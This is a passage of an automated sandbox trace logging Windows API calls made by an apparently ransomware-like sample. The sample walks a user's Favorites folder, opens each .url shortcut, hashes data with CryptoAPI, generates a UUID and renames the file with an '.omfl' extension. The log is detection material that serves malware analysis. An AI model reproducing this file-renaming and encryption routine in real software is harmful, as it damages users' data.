lpNewFilePointer=0x0) returned 1 [0133.680] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.682] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.683] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.683] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.683] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.683] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.683] GetLastError () returned 0x0 [0133.683] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.683] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.683] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.683] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.683] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.683] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.684] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0133.684] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.omfl")) returned 1 [0133.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.685] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.685] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.686] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.686] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0133.687] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0133.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.687] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.687] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.690] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.690] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.691] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.692] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.692] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.692] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.693] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.693] GetLastError () returned 0x0 [0133.693] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.693] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.693] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.693] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.693] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.693] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.693] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0133.694] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.omfl")) returned 1 [0133.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.696] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.696] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.699] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.699] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0133.699] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0133.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.729] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.729] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.733] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.733] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.735] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.736] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.736] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.736] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.736] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.736] GetLastError () returned 0x0 [0133.736] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.736] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.736] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.736] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.736] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.736] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.736] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.736] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0133.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.omfl")) returned 1 [0133.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.738] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.739] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0133.739] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0133.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0133.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0133.739] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0133.740] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0133.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0133.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0133.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0133.740] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0133.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0133.740] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0133.740] PathFindFileNameW (pszPath="") returned="" [0133.741] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0133.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.743] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.743] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.746] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.746] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.748] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.749] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.749] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.749] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.749] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.749] GetLastError () returned 0x0 [0133.749] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.749] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.749] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.749] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.749] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.752] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.omfl")) returned 1 [0133.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.753] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.755] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0133.755] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0133.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.764] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.764] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.767] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.767] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.769] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.770] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.770] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.770] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.770] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.770] GetLastError () returned 0x0 [0133.770] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.770] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.770] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.770] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.770] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.771] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.omfl")) returned 1 [0133.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.772] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.772] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.773] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0133.774] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0133.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.774] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.774] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.778] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.779] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.779] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.779] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.779] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.779] GetLastError () returned 0x0 [0133.779] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.779] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.779] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.779] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.779] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.780] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.omfl")) returned 1 [0133.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.781] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.782] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0133.782] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0133.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.794] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.794] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.797] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.798] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, 